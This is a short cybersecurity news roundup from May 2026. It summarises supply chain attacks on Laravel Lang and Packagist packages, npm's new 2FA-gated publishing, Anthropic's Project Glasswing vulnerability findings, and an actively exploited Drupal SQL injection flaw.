CyberNews: 24/05/2026 Edition

Published by Dunateo on 2026-05-24

Today’s roundup

  • Laravel Lang packages hijacked to deploy credential-stealing malware
  • npm Adds 2FA-Gated Publishing and Package Install Controls Against Supply Chain Attacks
  • Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
  • Anthropic’s Project Glasswing: 10,000+ Vulnerabilities Found in One Month, and the Patching Problem Has Never Been More Obvious
  • CVE-2026-9082: Drupal’s Highly Critical SQL Injection Flaw Is Already Under Active Attack

    • Summary

    A supply chain attack targeted Laravel Lang localization packages, leveraging GitHub version tags to distribute credential-stealing malware through Composer. This campaign highlights the ongoing risks associated with third-party software dependencies and the need for rigorous supply chain security practices.


    GitHub has enhanced npm's security with new controls, including "staged publishing," which requires maintainers to pass a two-factor authentication (2FA) challenge before a package release becomes publicly available. This aims to bolster software supply chain integrity by adding an extra layer of verification for package updates.


    A coordinated supply chain attack has infected eight packages on Packagist, utilizing malicious code to download and execute a Linux binary hosted on GitHub Releases. The attackers inserted the malicious code into `package.json` files within Composer packages, primarily targeting JavaScript-based projects.


    Anthropic's Project Glasswing, powered by its Claude Mythos Preview AI model, discovered over 10,000 high- or critical-severity vulnerability candidates across more than 1,000 open-source projects in one month. Following human validation, 1,094 exploitable flaws were confirmed, including a critical vulnerability (CVE-2026-5194, CVSS 9.1) in WolfSSL. The initiative underscores the increasing challenge of patching vulnerabilities at a pace that keeps up with AI-driven discovery.


    Drupal's highly critical SQL injection vulnerability, CVE-2026-9082, affecting sites using PostgreSQL databases, is now under active exploitation. Within 48 hours of its May 20 patch release, Imperva detected over 15,000 exploitation attempts targeting nearly 6,000 sites across 65 countries, with significant focus on gaming and financial services. The flaw enables unauthenticated attackers to achieve information disclosure, privilege escalation, and potentially remote code execution, necessitating immediate patching for affected systems.

    Want to dig deeper?

    Vulnerabilities

    CVE-2026-9082 High
    CVE-2026-5194 High